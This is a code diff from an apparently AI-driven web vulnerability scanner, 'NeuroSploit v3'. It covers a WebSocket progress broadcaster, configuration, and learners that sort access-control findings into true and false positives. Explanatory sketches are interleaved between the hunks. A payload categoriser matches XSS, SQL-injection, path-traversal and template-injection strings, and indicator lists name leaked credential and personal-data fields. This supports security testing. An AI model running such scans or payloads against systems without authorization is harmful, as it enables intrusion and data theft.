await self.send_to_scan(scan_id, {
"type": "phase_change",
"scan_id": scan_id,
"phase": phase
})
async def broadcast_progress(self, scan_id: str, progress: int, message: Optional[str] = None):
"""Send progress update"""
await self.send_to_scan(scan_id, {
"type": "progress_update",
"scan_id": scan_id,
"progress": progress,
"message": message
})
async def broadcast_endpoint_found(self, scan_id: str, endpoint: dict):
"""Notify a new endpoint was discovered"""
await self.send_to_scan(scan_id, {
"type": "endpoint_found",
"scan_id": scan_id,
"endpoint": endpoint
})
async def broadcast_path_crawled(self, scan_id: str, path: str, status: int):
"""Notify a path was crawled"""
await self.send_to_scan(scan_id, {
"type": "path_crawled",
"scan_id": scan_id,
"path": path,
"status": status
})
async def broadcast_url_discovered(self, scan_id: str, url: str):
"""Notify a URL was discovered"""
await self.send_to_scan(scan_id, {
"type": "url_discovered",
"scan_id": scan_id,
"url": url
})
async def broadcast_test_started(self, scan_id: str, vuln_type: str, endpoint: str):
"""Notify a vulnerability test has started"""
await self.send_to_scan(scan_id, {
"type": "test_started",
"scan_id": scan_id,
"vulnerability_type": vuln_type,
"endpoint": endpoint
})
async def broadcast_test_completed(self, scan_id: str, vuln_type: str, endpoint: str, is_vulnerable: bool):
"""Notify a vulnerability test has completed"""
await self.send_to_scan(scan_id, {
"type": "test_completed",
"scan_id": scan_id,
"vulnerability_type": vuln_type,
"endpoint": endpoint,
"is_vulnerable": is_vulnerable
})
async def broadcast_vulnerability_found(self, scan_id: str, vulnerability: dict):
"""Notify a vulnerability was found"""
await self.send_to_scan(scan_id, {
"type": "vuln_found",
"scan_id": scan_id,
"vulnerability": vulnerability
})
if HAS_NOTIFICATIONS:
asyncio.create_task(notification_manager.notify(
NotificationEvent.VULN_FOUND, {
"title": vulnerability.get("title", "Vulnerability Found"),
"severity": vulnerability.get("severity", "medium"),
"vulnerability_type": vulnerability.get("vulnerability_type", "unknown"),
"endpoint": vulnerability.get("endpoint", ""),
"description": vulnerability.get("description", ""),
}
))
async def broadcast_log(self, scan_id: str, level: str, message: str):
"""Send a log message"""
await self.send_to_scan(scan_id, {
"type": "log_message",
"scan_id": scan_id,
"level": level,
"message": message
})
async def broadcast_scan_completed(self, scan_id: str, summary: dict):
"""Notify that a scan has completed"""
await self.send_to_scan(scan_id, {
"type": "scan_completed",
"scan_id": scan_id,
"summary": summary
})
if HAS_NOTIFICATIONS:
asyncio.create_task(notification_manager.notify(
NotificationEvent.SCAN_COMPLETED, {
"total_vulnerabilities": summary.get("total_vulnerabilities", 0),
"critical": summary.get("critical", 0),
"high": summary.get("high", 0),
"medium": summary.get("medium", 0),
}
))
async def broadcast_scan_stopped(self, scan_id: str, summary: dict):
"""Notify that a scan was stopped by user"""
await self.send_to_scan(scan_id, {
"type": "scan_stopped",
"scan_id": scan_id,
"status": "stopped",
"summary": summary
})
async def broadcast_scan_failed(self, scan_id: str, error: str, summary: Optional[dict] = None):
"""Notify that a scan has failed"""
await self.send_to_scan(scan_id, {
"type": "scan_failed",
"scan_id": scan_id,
"status": "failed",
"error": error,
"summary": summary or {}
})
if HAS_NOTIFICATIONS:
asyncio.create_task(notification_manager.notify(
NotificationEvent.SCAN_FAILED, {"error": error}
))
async def broadcast_stats_update(self, scan_id: str, stats: dict):
"""Broadcast updated scan statistics"""
await self.send_to_scan(scan_id, {
"type": "stats_update",
"scan_id": scan_id,
"stats": stats
})
async def broadcast_agent_task(self, scan_id: str, task: dict):
"""Broadcast agent task update (created, started, completed, failed)"""
await self.send_to_scan(scan_id, {
"type": "agent_task",
"scan_id": scan_id,
"task": task
})
async def broadcast_agent_task_started(self, scan_id: str, task: dict):
"""Broadcast when an agent task starts"""
await self.send_to_scan(scan_id, {
"type": "agent_task_started",
"scan_id": scan_id,
"task": task
})
async def broadcast_agent_task_completed(self, scan_id: str, task: dict):
"""Broadcast when an agent task completes"""
await self.send_to_scan(scan_id, {
"type": "agent_task_completed",
"scan_id": scan_id,
"task": task
})
async def broadcast_report_generated(self, scan_id: str, report: dict):
"""Broadcast when a report is generated"""
await self.send_to_scan(scan_id, {
"type": "report_generated",
"scan_id": scan_id,
"report": report
})
async def broadcast_error(self, scan_id: str, error: str):
"""Notify an error occurred"""
await self.send_to_scan(scan_id, {
"type": "error",
"scan_id": scan_id,
"error": error
})
# Global instance
manager = ConnectionManager()
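The core of `ConnectionManager` is the fan-out in `send_to_scan`: serialize once, send to every socket registered for the scan, and prune sockets whose send raised. The sketch below reproduces that idea without FastAPI. `FakeSocket`, the free function `send_to_scan`, and `demo` are hypothetical stand-ins written for this example, not part of the original module.

```python
import asyncio
import json
from typing import Dict, List


class FakeSocket:
    """Hypothetical stand-in for fastapi.WebSocket, used only in this sketch."""

    def __init__(self, alive: bool = True):
        self.alive = alive
        self.sent: List[str] = []

    async def send_text(self, data: str) -> None:
        if not self.alive:
            raise RuntimeError("connection closed")
        self.sent.append(data)


async def send_to_scan(
    connections: Dict[str, List[FakeSocket]], scan_id: str, message: dict
) -> None:
    payload = json.dumps(message)  # serialize once for all receivers
    dead = []
    # Iterate over a copy so later removals cannot disturb the loop.
    for conn in list(connections.get(scan_id, [])):
        try:
            await conn.send_text(payload)
        except Exception:
            dead.append(conn)
    remaining = connections.get(scan_id)
    if remaining is None:
        return
    for conn in dead:
        if conn in remaining:
            remaining.remove(conn)
    if not remaining:
        # Drop the scan entry once nobody is listening.
        connections.pop(scan_id, None)


async def demo() -> Dict[str, List[FakeSocket]]:
    conns = {"scan-1": [FakeSocket(), FakeSocket(alive=False)]}
    await send_to_scan(conns, "scan-1", {"type": "progress_update", "progress": 40})
    return conns


result = asyncio.run(demo())
```

After `demo()` runs, only the live socket should remain registered for `scan-1`, and it should hold the single JSON message.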
-91
@@ -1,91 +0,0 @@
"""
NeuroSploit v3 - Configuration
"""
import os
from pathlib import Path
from typing import Optional
from pydantic_settings import BaseSettings
class Settings(BaseSettings):
"""Application settings"""
# Application
APP_NAME: str = "NeuroSploit v3"
APP_VERSION: str = "3.0.0"
DEBUG: bool = True
# Server
HOST: str = "0.0.0.0"
PORT: int = 8000
# Database
DATABASE_URL: str = "sqlite+aiosqlite:///./data/neurosploit.db"
# Paths
BASE_DIR: Path = Path(__file__).parent.parent
DATA_DIR: Path = BASE_DIR / "data"
REPORTS_DIR: Path = DATA_DIR / "reports"
SCANS_DIR: Path = DATA_DIR / "scans"
PROMPTS_DIR: Path = BASE_DIR / "prompts"
# LLM Settings
ANTHROPIC_API_KEY: Optional[str] = os.getenv("ANTHROPIC_API_KEY")
OPENAI_API_KEY: Optional[str] = os.getenv("OPENAI_API_KEY")
NIM_API_KEY: Optional[str] = os.getenv("NIM_API_KEY")
NIM_BASE_URL: str = os.getenv("NIM_BASE_URL", "https://integrate.api.nvidia.com/v1/chat/completions")
OPENROUTER_API_KEY: Optional[str] = os.getenv("OPENROUTER_API_KEY")
GEMINI_API_KEY: Optional[str] = os.getenv("GEMINI_API_KEY")
AZURE_OPENAI_API_KEY: Optional[str] = os.getenv("AZURE_OPENAI_API_KEY")
AZURE_OPENAI_ENDPOINT: Optional[str] = os.getenv("AZURE_OPENAI_ENDPOINT")
AZURE_OPENAI_API_VERSION: str = os.getenv("AZURE_OPENAI_API_VERSION", "2024-02-01")
AZURE_OPENAI_DEPLOYMENT: Optional[str] = os.getenv("AZURE_OPENAI_DEPLOYMENT")
TOGETHER_API_KEY: Optional[str] = os.getenv("TOGETHER_API_KEY")
FIREWORKS_API_KEY: Optional[str] = os.getenv("FIREWORKS_API_KEY")
DEFAULT_LLM_PROVIDER: str = "claude"
DEFAULT_LLM_MODEL: str = "claude-sonnet-4-20250514"
MAX_OUTPUT_TOKENS: Optional[int] = None
ENABLE_MODEL_ROUTING: bool = False
# Feature Flags
ENABLE_KNOWLEDGE_AUGMENTATION: bool = False
ENABLE_BROWSER_VALIDATION: bool = False
ENABLE_VULN_AGENTS: bool = False
VULN_AGENT_CONCURRENCY: int = 10
ENABLE_SMART_ROUTER: bool = False
# RAG (Retrieval-Augmented Generation)
ENABLE_RAG: bool = True # Enabled by default (zero deps, uses BM25)
RAG_BACKEND: str = "auto" # "auto", "chromadb", "tfidf", "bm25"
# External Methodology File (injected into all LLM calls)
METHODOLOGY_FILE: Optional[str] = None # Path to .md methodology file
# CLI Agent (AI CLI tools inside Kali sandbox)
ENABLE_CLI_AGENT: bool = False # Feature flag (default: disabled)
CLI_AGENT_MAX_RUNTIME: int = 1800 # Max runtime in seconds (default: 30 min)
CLI_AGENT_DEFAULT_PROVIDER: str = "claude_code" # Default CLI provider
# Codex LLM
CODEX_API_KEY: Optional[str] = os.getenv("CODEX_API_KEY")
# Scan Settings
MAX_CONCURRENT_SCANS: int = 5
DEFAULT_TIMEOUT: int = 30
MAX_REQUESTS_PER_SECOND: int = 10
# CORS
CORS_ORIGINS: list = ["http://localhost:3000", "http://127.0.0.1:3000"]
class Config:
env_file = ".env"
case_sensitive = True
extra = "ignore"
settings = Settings()
# Ensure directories exist
settings.DATA_DIR.mkdir(parents=True, exist_ok=True)
settings.REPORTS_DIR.mkdir(parents=True, exist_ok=True)
settings.SCANS_DIR.mkdir(parents=True, exist_ok=True)
-1
@@ -1 +0,0 @@
# Core modules
@@ -1,423 +0,0 @@
"""
NeuroSploit v3 - Access Control Learning Engine
Adaptive learning system for BOLA/BFLA/IDOR and other access control testing.
Records test outcomes and response patterns to improve future evaluations.
Key insight: HTTP status codes are unreliable for access control testing.
This module learns from actual response DATA patterns to distinguish:
- True positives (cross-user data access)
- False positives (error messages, login pages, empty responses with 200 status)
Usage:
learner = AccessControlLearner()
# Record a test outcome
learner.record_test(vuln_type, url, status_code, response_body, is_true_positive, pattern_notes)
# Get learned patterns for a target
patterns = learner.get_patterns_for_target(domain)
# Get learning context for AI prompts
context = learner.get_learning_context(vuln_type)
"""
import json
import logging
import re
from dataclasses import dataclass, field, asdict
from datetime import datetime
from pathlib import Path
from typing import Dict, List, Optional
logger = logging.getLogger(__name__)
DATA_DIR = Path(__file__).parent.parent.parent / "data"
LEARNING_FILE = DATA_DIR / "access_control_learning.json"
@dataclass
class ResponsePattern:
"""A learned response pattern from access control testing."""
pattern_type: str # "denial", "empty", "login_page", "data_leak", "public_data"
indicators: List[str] # Strings/patterns that identify this response type
is_false_positive: bool # True if this pattern indicates a false positive
confidence: float # 0.0-1.0 how reliable this pattern is
example_body: str # Truncated example response body
vuln_type: str # bola, bfla, idor, etc.
target_domain: str # Domain this was learned from
timestamp: str # When this was learned
@dataclass
class TestRecord:
"""Record of an access control test outcome."""
vuln_type: str
target_url: str
status_code: int
response_length: int
is_true_positive: bool
pattern_type: str # What pattern was identified
key_indicators: List[str] # What strings/patterns were decisive
notes: str # Human or AI notes about why this was TP/FP
timestamp: str
class AccessControlLearner:
"""Adaptive learning engine for access control vulnerability testing.
Learns from test outcomes to identify response patterns that indicate
true vs false positives for BOLA, BFLA, IDOR, and related vuln types.
"""
MAX_RECORDS = 500
MAX_PATTERNS = 200
# Pre-seeded patterns from known false positive scenarios
DEFAULT_PATTERNS: List[Dict] = [
{
"pattern_type": "denial_200",
"indicators": ["unauthorized", "forbidden", "access denied", "not authorized",
"permission denied", "insufficient privileges"],
"is_false_positive": True,
"confidence": 0.9,
"description": "Server returns 200 OK but body contains access denial message",
},
{
"pattern_type": "empty_200",
"indicators": ["[]", "{}", '""', "null", ""],
"is_false_positive": True,
"confidence": 0.85,
"description": "Server returns 200 OK with empty/null response body",
},
{
"pattern_type": "login_redirect",
"indicators": ["type=\"password\"", "sign in", "log in", "login",
"authentication required"],
"is_false_positive": True,
"confidence": 0.95,
"description": "Server returns 200 OK but body is a login page",
},
{
"pattern_type": "error_json",
"indicators": ['"error":', '"status":"error"', '"success":false',
'"message":"not found"', '"code":401', '"code":403'],
"is_false_positive": True,
"confidence": 0.9,
"description": "Server returns 200 OK but JSON body indicates error",
},
{
"pattern_type": "own_data",
"indicators": [],
"is_false_positive": True,
"confidence": 0.8,
"description": "Server returns authenticated user's own data regardless of requested ID",
},
{
"pattern_type": "public_data",
"indicators": [],
"is_false_positive": True,
"confidence": 0.7,
"description": "Response contains only public profile fields (username, bio) not private data",
},
{
"pattern_type": "cross_user_data",
"indicators": ['"email":', '"phone":', '"address":', '"ssn":',
'"credit_card":', '"password":', '"secret":'],
"is_false_positive": False,
"confidence": 0.9,
"description": "Response contains another user's private data fields",
},
{
"pattern_type": "admin_data_leak",
"indicators": ['"role":"admin"', '"is_admin":true', '"users":[',
'"audit_log":', '"system_config":'],
"is_false_positive": False,
"confidence": 0.9,
"description": "Response contains admin-level data accessible to non-admin user",
},
{
"pattern_type": "state_change",
"indicators": ['"updated":', '"deleted":', '"created":', '"modified":',
'"success":true'],
"is_false_positive": False,
"confidence": 0.85,
"description": "Write operation succeeded on another user's resource",
},
]
# Known application patterns that cause false positives
KNOWN_FP_PATTERNS: Dict[str, List[str]] = {
"wso2": ["wso2", "carbon", "identity server", "api manager"],
"keycloak": ["keycloak", "red hat sso"],
"spring_security": ["spring security", "whitelabel error"],
"oauth2_proxy": ["oauth2-proxy", "sign in with"],
"cloudflare": ["cloudflare", "cf-ray", "attention required"],
"aws_waf": ["aws-waf", "request blocked"],
}
def __init__(self, data_dir: Optional[Path] = None):
self.data_dir = data_dir or DATA_DIR
self.learning_file = self.data_dir / "access_control_learning.json"
self.records: List[TestRecord] = []
self.custom_patterns: List[ResponsePattern] = []
self._load()
def _load(self):
"""Load learning data from disk."""
try:
if self.learning_file.exists():
with open(self.learning_file, "r") as f:
data = json.load(f)
self.records = [
TestRecord(**r) for r in data.get("records", [])
]
self.custom_patterns = [
ResponsePattern(**p) for p in data.get("patterns", [])
]
logger.debug(f"Loaded {len(self.records)} records, {len(self.custom_patterns)} patterns")
except Exception as e:
logger.warning(f"Failed to load learning data: {e}")
def _save(self):
"""Save learning data to disk."""
try:
self.data_dir.mkdir(parents=True, exist_ok=True)
data = {
"records": [asdict(r) for r in self.records[-self.MAX_RECORDS:]],
"patterns": [asdict(p) for p in self.custom_patterns[-self.MAX_PATTERNS:]],
"metadata": {
"total_records": len(self.records),
"total_patterns": len(self.custom_patterns),
"last_updated": datetime.now().isoformat(),
},
}
with open(self.learning_file, "w") as f:
json.dump(data, f, indent=2)
except Exception as e:
logger.warning(f"Failed to save learning data: {e}")
def record_test(
self,
vuln_type: str,
target_url: str,
status_code: int,
response_body: str,
is_true_positive: bool,
pattern_notes: str = "",
):
"""Record an access control test outcome for learning.
Called after the validation judge makes a decision, with the
verified outcome (true positive or false positive).
"""
# Identify response pattern
pattern_type = self._classify_response(response_body, status_code)
key_indicators = self._extract_key_indicators(response_body)
record = TestRecord(
vuln_type=vuln_type,
target_url=target_url,
status_code=status_code,
response_length=len(response_body),
is_true_positive=is_true_positive,
pattern_type=pattern_type,
key_indicators=key_indicators[:10],
notes=pattern_notes[:500],
timestamp=datetime.now().isoformat(),
)
self.records.append(record)
# Learn new pattern if we have enough data
self._maybe_learn_pattern(record, response_body)
# Auto-save periodically
if len(self.records) % 10 == 0:
self._save()
def _classify_response(self, body: str, status: int) -> str:
"""Classify the response into a pattern type."""
body_lower = body.lower().strip()
if len(body_lower) < 10:
return "empty_200"
# Check for denial indicators
denial = ["unauthorized", "forbidden", "access denied", "not authorized",
"permission denied", '"error":', '"success":false']
if sum(1 for d in denial if d in body_lower) >= 2:
return "denial_200"
# Check for login page
login = ["type=\"password\"", "sign in", "log in", "<form"]
if sum(1 for l in login if l in body_lower) >= 2:
return "login_redirect"
# Check for data fields
data = ['"email":', '"name":', '"phone":', '"address":',
'"role":', '"password":', '"token":']
if sum(1 for d in data if d in body_lower) >= 2:
return "cross_user_data" if status == 200 else "blocked_data"
return "unknown"
def _extract_key_indicators(self, body: str) -> List[str]:
"""Extract key string indicators from the response."""
indicators = []
body_lower = body.lower()
# Check for JSON keys
json_keys = re.findall(r'"(\w+)":', body[:2000])
indicators.extend(json_keys[:10])
# Check for specific patterns
patterns = {
"has_email": '"email":' in body_lower,
"has_name": '"name":' in body_lower,
"has_error": '"error":' in body_lower,
"has_success_false": '"success":false' in body_lower or '"success": false' in body_lower,
"has_login_form": 'type="password"' in body_lower,
"is_empty_array": body.strip() in ("[]", "{}"),
"has_html_form": "<form" in body_lower,
}
for key, present in patterns.items():
if present:
indicators.append(key)
return indicators
def _maybe_learn_pattern(self, record: TestRecord, body: str):
"""Learn a new pattern from a test record if it provides new insight."""
from urllib.parse import urlparse
domain = urlparse(record.target_url).netloc
body_excerpt = body[:500]
# Check if we already know this pattern for this domain
known = any(
p.target_domain == domain
and p.pattern_type == record.pattern_type
and p.vuln_type == record.vuln_type
for p in self.custom_patterns
)
if known:
return
# Learn new domain-specific pattern
pattern = ResponsePattern(
pattern_type=record.pattern_type,
indicators=record.key_indicators,
is_false_positive=not record.is_true_positive,
confidence=0.7, # Start with moderate confidence
example_body=body_excerpt,
vuln_type=record.vuln_type,
target_domain=domain,
timestamp=record.timestamp,
)
self.custom_patterns.append(pattern)
def get_patterns_for_target(self, domain: str) -> List[ResponsePattern]:
"""Get learned patterns for a specific target domain."""
return [
p for p in self.custom_patterns
if p.target_domain == domain
]
def get_false_positive_rate(self, vuln_type: str) -> float:
"""Get the false positive rate for a specific vuln type from historical data."""
type_records = [r for r in self.records if r.vuln_type == vuln_type]
if not type_records:
return 0.5 # No data → assume 50%
fp_count = sum(1 for r in type_records if not r.is_true_positive)
return fp_count / len(type_records)
def get_learning_context(self, vuln_type: str, domain: str = "") -> str:
"""Generate learning context for AI prompts.
Returns a formatted string with learned patterns and statistics
that can be injected into LLM prompts to improve access control testing.
"""
parts = []
# Historical stats
type_records = [r for r in self.records if r.vuln_type == vuln_type]
if type_records:
total = len(type_records)
tp = sum(1 for r in type_records if r.is_true_positive)
fp = total - tp
parts.append(
f"Historical {vuln_type} testing: {total} tests, "
f"{tp} true positives ({100*tp/total:.0f}%), "
f"{fp} false positives ({100*fp/total:.0f}%)"
)
# Most common FP patterns
fp_patterns = [r.pattern_type for r in type_records if not r.is_true_positive]
if fp_patterns:
from collections import Counter
common = Counter(fp_patterns).most_common(3)
pattern_str = ", ".join(f"{p} ({c}x)" for p, c in common)
parts.append(f"Common false positive patterns: {pattern_str}")
# Domain-specific patterns
if domain:
domain_patterns = self.get_patterns_for_target(domain)
if domain_patterns:
for p in domain_patterns[:5]:
status = "FALSE POSITIVE" if p.is_false_positive else "TRUE POSITIVE"
parts.append(
f"Known pattern for {domain}: {p.pattern_type} = {status} "
f"(confidence: {p.confidence:.0%})"
)
# Known application FP patterns
if domain:
for app_name, indicators in self.KNOWN_FP_PATTERNS.items():
if any(i in domain.lower() for i in indicators):
parts.append(
f"WARNING: Target appears to use {app_name}, "
f"which is known for producing false positive access control findings"
)
if not parts:
return ""
return "## Learned Access Control Patterns\n" + "\n".join(f"- {p}" for p in parts)
def get_evaluation_hints(self, vuln_type: str, response_body: str, status: int) -> Dict:
"""Get evaluation hints for a specific response.
Returns hints that can help the validation judge or AI make better decisions.
"""
pattern_type = self._classify_response(response_body, status)
indicators = self._extract_key_indicators(response_body)
# Check against default patterns
matching_default = [
p for p in self.DEFAULT_PATTERNS
if any(i.lower() in response_body.lower() for i in p["indicators"] if i)
]
# Check against learned patterns
matching_learned = [
p for p in self.custom_patterns
if p.vuln_type == vuln_type and p.pattern_type == pattern_type
]
fp_signals = sum(
1 for p in matching_default if p["is_false_positive"]
) + sum(
1 for p in matching_learned if p.is_false_positive
)
tp_signals = sum(
1 for p in matching_default if not p["is_false_positive"]
) + sum(
1 for p in matching_learned if not p.is_false_positive
)
return {
"pattern_type": pattern_type,
"indicators": indicators,
"fp_signals": fp_signals,
"tp_signals": tp_signals,
"likely_false_positive": fp_signals > tp_signals,
"matching_patterns": len(matching_default) + len(matching_learned),
}
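The classification step in `_classify_response` is a "two or more indicators" vote applied in a fixed order: empty body, then denial phrases, then login-page markers, then data fields. A standalone sketch of that heuristic is shown here. The indicator tuples are copied from the method above; the function names `hits` and `classify` are hypothetical and exist only for this example.

```python
from typing import Sequence

DENIAL = ("unauthorized", "forbidden", "access denied", "not authorized",
          "permission denied", '"error":', '"success":false')
LOGIN = ('type="password"', "sign in", "log in", "<form")
DATA = ('"email":', '"name":', '"phone":', '"address":',
        '"role":', '"password":', '"token":')


def hits(needles: Sequence[str], haystack: str) -> int:
    """Count how many indicator strings occur in the text."""
    return sum(1 for n in needles if n in haystack)


def classify(body: str, status: int) -> str:
    text = body.lower().strip()
    if len(text) < 10:
        return "empty_200"
    # A single phrase is not decisive; each class needs at least two hits.
    if hits(DENIAL, text) >= 2:
        return "denial_200"
    if hits(LOGIN, text) >= 2:
        return "login_redirect"
    if hits(DATA, text) >= 2:
        return "cross_user_data" if status == 200 else "blocked_data"
    return "unknown"
```

Because the checks run in order, a body that mixes an error envelope with data fields is classified as a denial before the data-field check is reached.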
@@ -1,357 +0,0 @@
"""
NeuroSploit v3 - Adaptive Learner
Cross-scan adaptive learning from user TP/FP feedback on ALL vulnerability types.
Extends the pattern established by AccessControlLearner to cover the full 100-type spectrum.
The agent learns from user feedback to avoid repeating false positives
and to be more aggressive on confirmed true positive patterns.
"""
import json
import re
from pathlib import Path
from datetime import datetime
from dataclasses import dataclass, field, asdict
from typing import List, Dict, Optional, Tuple
from collections import defaultdict
import logging
logger = logging.getLogger(__name__)
STORAGE_FILE = Path("data/adaptive_learning.json")
MAX_FEEDBACK = 1000
MAX_PATTERNS = 500
FP_THRESHOLD = 3 # After 3 FP feedbacks on same pattern, mark as known FP
@dataclass
class FeedbackRecord:
"""User feedback on a finding."""
vuln_id: str
vuln_type: str
endpoint_pattern: str
param: str = ""
payload_pattern: str = ""
is_true_positive: bool = True
explanation: str = ""
severity: str = "medium"
domain: str = ""
timestamp: str = ""
def __post_init__(self):
if not self.timestamp:
self.timestamp = datetime.utcnow().isoformat()
@dataclass
class LearnedPattern:
"""A pattern learned from multiple feedback records."""
endpoint_pattern: str
vuln_type: str
indicators: List[str] = field(default_factory=list)
is_false_positive: bool = True
confidence: float = 0.5
feedback_count: int = 0
domain: str = ""
explanation_summary: str = ""
last_updated: str = ""
def __post_init__(self):
if not self.last_updated:
self.last_updated = datetime.utcnow().isoformat()
class AdaptiveLearner:
"""Cross-scan adaptive learning from user feedback on all vuln types."""
def __init__(self):
self._feedback: List[FeedbackRecord] = []
self._patterns: Dict[str, List[LearnedPattern]] = {} # vuln_type -> patterns
self._metadata = {"total_feedback": 0, "total_patterns": 0}
self._dirty = False
self._load()
def _load(self):
"""Load persisted learning data."""
if not STORAGE_FILE.exists():
return
try:
data = json.loads(STORAGE_FILE.read_text())
for fb in data.get("feedback", []):
self._feedback.append(FeedbackRecord(**fb))
for vuln_type, patterns in data.get("patterns", {}).items():
self._patterns[vuln_type] = [LearnedPattern(**p) for p in patterns]
self._metadata = data.get("metadata", self._metadata)
except Exception as e:
logger.warning(f"Failed to load adaptive learning data: {e}")
def _save(self):
"""Persist learning data to disk."""
STORAGE_FILE.parent.mkdir(parents=True, exist_ok=True)
data = {
"feedback": [asdict(fb) for fb in self._feedback[-MAX_FEEDBACK:]],
"patterns": {
vt: [asdict(p) for p in patterns[-MAX_PATTERNS:]]
for vt, patterns in self._patterns.items()
},
"metadata": {
"total_feedback": len(self._feedback),
"total_patterns": sum(len(p) for p in self._patterns.values()),
"last_updated": datetime.utcnow().isoformat(),
}
}
try:
STORAGE_FILE.write_text(json.dumps(data, indent=2))
self._dirty = False
except Exception as e:
logger.warning(f"Failed to save adaptive learning data: {e}")
@staticmethod
def _normalize_endpoint(url: str) -> str:
"""Replace UUIDs and numeric IDs in URLs with {id}, and dates with {date}, for generalization."""
if not url:
return ""
# Replace UUIDs
normalized = re.sub(
r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}',
'{id}', url, flags=re.IGNORECASE
)
# Replace numeric IDs in path segments
normalized = re.sub(r'/\d+(?=/|$|\?)', '/{id}', normalized)
# Replace dates
normalized = re.sub(r'\d{4}-\d{2}-\d{2}', '{date}', normalized)
return normalized
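To make the effect of `_normalize_endpoint` concrete, here is a standalone sketch using the same three regular expressions in the same order. The module-level function name `normalize_endpoint` and the precompiled `UUID_RE` are assumptions made for this example.

```python
import re

UUID_RE = re.compile(
    r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}",
    re.IGNORECASE,
)


def normalize_endpoint(url: str) -> str:
    if not url:
        return ""
    # UUIDs go first so their digit groups are not touched by later rules.
    out = UUID_RE.sub("{id}", url)
    # A numeric ID is a whole path segment: digits followed by '/', '?', or end.
    out = re.sub(r"/\d+(?=/|$|\?)", "/{id}", out)
    # ISO-style dates get their own placeholder.
    out = re.sub(r"\d{4}-\d{2}-\d{2}", "{date}", out)
    return out
```

Segments such as `v2` are left alone because the numeric rule only matches segments made up entirely of digits, so `/v2/items/9` and `/v2/items/10` collapse to the same pattern while the API version is preserved.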
def record_feedback(
self,
vuln_id: str,
vuln_type: str,
endpoint: str,
param: str = "",
payload: str = "",
is_tp: bool = True,
explanation: str = "",
severity: str = "medium",
domain: str = "",
):
"""Record user TP/FP feedback on a finding."""
normalized_endpoint = self._normalize_endpoint(endpoint)
record = FeedbackRecord(
vuln_id=vuln_id,
vuln_type=vuln_type,
endpoint_pattern=normalized_endpoint,
param=param,
payload_pattern=self._categorize_payload(payload),
is_true_positive=is_tp,
explanation=explanation[:2000],
severity=severity,
domain=domain,
)
self._feedback.append(record)
self._learn_from_feedback(record)
self._save()
@staticmethod
def _categorize_payload(payload: str) -> str:
"""Categorize a payload into a pattern type."""
if not payload:
return ""
p = payload.lower()
if "<script" in p or "onerror" in p or "onload" in p:
return "script_tag"
if "union" in p and "select" in p:
return "union_select"
if "'" in p or '"' in p:
return "quote_injection"
if "../" in p or "..\\" in p:
return "path_traversal"
if "{{" in p or "${" in p:
return "template_expression"
if "http://" in p or "https://" in p:
return "url_payload"
return "generic"
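The order of the checks in `_categorize_payload` decides the label when a payload matches several rules: for example, the quote check runs before the path-traversal and template checks. One way to make that precedence explicit is a rule table, sketched below. The `RULES` list and the free function `categorize_payload` are hypothetical; the predicates mirror the conditions in the method above.

```python
from typing import Callable, List, Tuple

# Rules are evaluated top to bottom; the first match wins.
RULES: List[Tuple[str, Callable[[str], bool]]] = [
    ("script_tag", lambda p: "<script" in p or "onerror" in p or "onload" in p),
    ("union_select", lambda p: "union" in p and "select" in p),
    ("quote_injection", lambda p: "'" in p or '"' in p),
    ("path_traversal", lambda p: "../" in p or "..\\" in p),
    ("template_expression", lambda p: "{{" in p or "${" in p),
    ("url_payload", lambda p: "http://" in p or "https://" in p),
]


def categorize_payload(payload: str) -> str:
    if not payload:
        return ""
    p = payload.lower()
    for label, matches in RULES:
        if matches(p):
            return label
    return "generic"
```

With this ordering, `' UNION SELECT 1--` is labelled `union_select` rather than `quote_injection`, while a template payload that contains a quote, such as `${'a'}`, is labelled `quote_injection`.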
def _learn_from_feedback(self, record: FeedbackRecord):
"""Learn patterns from accumulated feedback."""
vuln_type = record.vuln_type
if vuln_type not in self._patterns:
self._patterns[vuln_type] = []
# Find existing pattern for this endpoint+vuln_type
existing = None
for pattern in self._patterns[vuln_type]:
if (pattern.endpoint_pattern == record.endpoint_pattern and
pattern.domain == record.domain):
existing = pattern
break
if existing:
existing.feedback_count += 1
existing.last_updated = datetime.utcnow().isoformat()
# Recalculate FP/TP ratio
fb_for_pattern = [
fb for fb in self._feedback
if fb.vuln_type == vuln_type
and fb.endpoint_pattern == record.endpoint_pattern
and fb.domain == record.domain
]
fp_count = sum(1 for fb in fb_for_pattern if not fb.is_true_positive)
tp_count = sum(1 for fb in fb_for_pattern if fb.is_true_positive)
total = fp_count + tp_count
if total > 0:
fp_rate = fp_count / total
existing.is_false_positive = fp_rate >= 0.6
existing.confidence = max(fp_rate, 1.0 - fp_rate)
# Update explanation summary
if record.explanation:
if existing.explanation_summary:
existing.explanation_summary = f"{existing.explanation_summary}; {record.explanation[:200]}"
else:
existing.explanation_summary = record.explanation[:500]
# Truncate if too long
existing.explanation_summary = existing.explanation_summary[:1000]
# Update indicators
if record.param and record.param not in existing.indicators:
existing.indicators.append(record.param)
else:
# Create new pattern
new_pattern = LearnedPattern(
endpoint_pattern=record.endpoint_pattern,
vuln_type=vuln_type,
indicators=[record.param] if record.param else [],
is_false_positive=not record.is_true_positive,
confidence=0.5,
feedback_count=1,
domain=record.domain,
explanation_summary=record.explanation[:500],
)
self._patterns[vuln_type].append(new_pattern)
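When a pattern already exists, `_learn_from_feedback` recomputes its verdict from all matching feedback: the pattern is treated as a false positive once the FP rate reaches 0.6, and its confidence is the larger of the FP rate and the TP rate. A small sketch of that arithmetic follows, assuming a hypothetical `summarize` helper that takes the feedback as a list of booleans (`True` for a true-positive report).

```python
from typing import List, Tuple

FP_CUTOFF = 0.6  # same cutoff the method above applies to the FP rate


def summarize(verdicts: List[bool]) -> Tuple[bool, float]:
    """Return (is_false_positive, confidence) for a list of TP/FP reports."""
    if not verdicts:
        raise ValueError("at least one feedback record is required")
    fp = sum(1 for is_tp in verdicts if not is_tp)
    fp_rate = fp / len(verdicts)
    # Confidence is how lopsided the feedback is, in either direction.
    return fp_rate >= FP_CUTOFF, max(fp_rate, 1.0 - fp_rate)
```

Two FP reports and one TP report give an FP rate of 2/3, so the pattern is marked as a false positive with confidence of about 0.67. An even split gives confidence 0.5, which falls below the 0.6 filter used by `get_learning_context`, so a contested pattern does not reach the prompt.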
def get_learning_context(self, vuln_type: str, domain: str = "") -> str:
"""Generate prompt context from learned patterns for a vuln type."""
patterns = self._patterns.get(vuln_type, [])
if not patterns:
return ""
# Filter by domain if specified
relevant = patterns
if domain:
